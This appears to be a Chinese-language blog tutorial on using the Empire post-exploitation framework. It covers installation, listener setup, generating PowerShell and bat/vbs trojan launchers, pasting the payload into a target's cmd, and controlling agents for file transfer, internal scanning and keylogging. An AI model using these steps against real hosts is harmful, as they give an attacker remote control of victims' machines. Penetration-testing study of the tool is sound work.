Empire- 后渗测试

Empire 后渗工具使用

  1. Empire后渗测试工具重点先说明这支持内网跨网也不行(可能可以公网连接没测试);
  2. 这个工具主要原理通过Python建立一个http服务让agent进行回调至目标
  3. Agent端目前只支持windows系统

下载工具

Github: https://github.com/EmpireProject/Empire
下载命令: git clone https://github.com/EmpireProject/Empire.git

安装步骤

Empiresetup目录执行install.sh文件
./install.sh 或者不行就 ./reset.sh
Tips: 您将获得有关python的一些问题,实际上仅足够下载此工具库。

使用基本的工具步骤

展示界面
在这里插入图片描述

  1. 使用模块使用
    在这里插入图片描述
  2. 展示Listeners http模块中的info
    设置名称: set Name door
    设置端口: set Port 4447(自己本机代理监听端口)
    设置反弹地址: set Host 0.0.0.0 (也就是自己的地址)
    执行生成好的代理: execute
    在这里插入图片描述
  3. 接下来相当于设置payload(形成木马,该木马内容经过base64编译但头部没有)
    命令: launcher powershell door(只是你生成的代理名称)
    在这里插入图片描述
  4. 生成bat,vbs等木马方法
    命令:usetarger windows/dll
    查看参数选项: info
    Tips: 根据自己需求格式就如上命令所示选中在通过info进行设置相应的参数即可,生成的bat包运行后会自动消失。
    在这里插入图片描述

客户端操作流程

  1. 将生成好的base64木马直接粘贴至cmd命令框中
    在这里插入图片描述
  2. 服务端已监听状态显示
    命令: agents (显示当前已成功监听的client,如果监听断开连接如碰到关机断网的情况下则出现红色字眼)

在这里插入图片描述
3. 进入client客户端

4. 控制客户端命令(如:上传,下载,查看主机信息,扫描内网存活主机)
Tips: 这些功能有些在使用的时候目标主机会报毒,所以尽可能在拿到shell情况下赶紧提权维持会话等操作,因为这个工具目前好像只能提供展示的零时会话。进入客户端也会有两大常用模块。

使用模块命令: usemodule situational_awareness
在这里插入图片描述
Tips: 其实更多模块可以参照其他博客(说实话其他的功能也没什么特别适用于真是环境的)

问题:

  1. 生成的木马不能够免杀 该工具已经停止维护。
  2. Client控制的时候很多模块会报毒及记录不稳定比如键盘记录等…
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值